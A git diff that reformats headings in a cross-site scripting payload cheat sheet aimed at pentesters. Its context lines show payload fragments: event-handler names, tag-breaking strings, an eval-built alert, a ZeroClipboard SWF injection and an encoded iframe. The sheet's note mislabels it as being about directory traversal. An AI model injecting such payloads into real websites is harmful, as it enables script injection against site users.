diff --git a/cheatsheets/All-XSS-Payloads-Cheat-Sheet.md b/cheatsheets/All-XSS-Payloads-Cheat-Sheet.md
index 27a48e7..ab7fea2 100644
--- a/cheatsheets/All-XSS-Payloads-Cheat-Sheet.md
+++ b/cheatsheets/All-XSS-Payloads-Cheat-Sheet.md
@@ -1,10 +1,10 @@
-ULTIMATE CROSS SITE SCRIPTING CHEAT SHEET
+# ULTIMATE CROSS SITE SCRIPTING CHEAT SHEET
-Note: This is a technical sheet for research about directory- and path traversal attacks.
-Please continue the ultimate directory traversal cheat sheet list or contribute to update.
-This cheat sheet list goes out to assist pentesters, developers, researchers & whitehats.
+# Note: This is a technical sheet for research about directory- and path traversal attacks.
+# Please continue the ultimate directory traversal cheat sheet list or contribute to update.
+# This cheat sheet list goes out to assist pentesters, developers, researchers & whitehats.
-Tags to Trigger XSS Attacks:
+# Tags to Trigger XSS Attacks:
onclick
ondblclick
onmousedown
@@ -29,7 +29,7 @@ onreset
onselect
onMoveOn
-Brackets for Tags
+# Brackets for Tags
>"
">
<"
@@ -114,7 +114,7 @@ Pjw=
\u003c
\u003C
-XSS Strings:
+# XSS Strings:
@@ -192,7 +192,7 @@ exp/*">'>
'';!--"=&{()}
@@ -410,7 +410,7 @@ perl -e 'print "alert(\"XSS\")";' > out
-Flash SWF XSS
+# Flash SWF XSS
ZeroClipboard: ZeroClipboard.swf?id=\"))}catch(e){confirm(/XSS./.source);}//&width=500&height=500&.swf
@@ -451,7 +451,7 @@ d="alert('XSS');\")";
eval(a+b+c+d);
-XML Schema
+# XML Schema
XSS
@@ -558,14 +558,14 @@ PGlmcmFtZSBzcmM9aHR0cDovL3Rlc3QuZGU+
ì>
-Firefox (\x09, \x0a, \x0d, \x20)
-Chrome (Any character \x01 to \x20)
+# Firefox (\x09, \x0a, \x0d, \x20)
+# Chrome (Any character \x01 to \x20)
alert(0)
@@ -823,43 +823,43 @@ a=c.join([]);b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototyp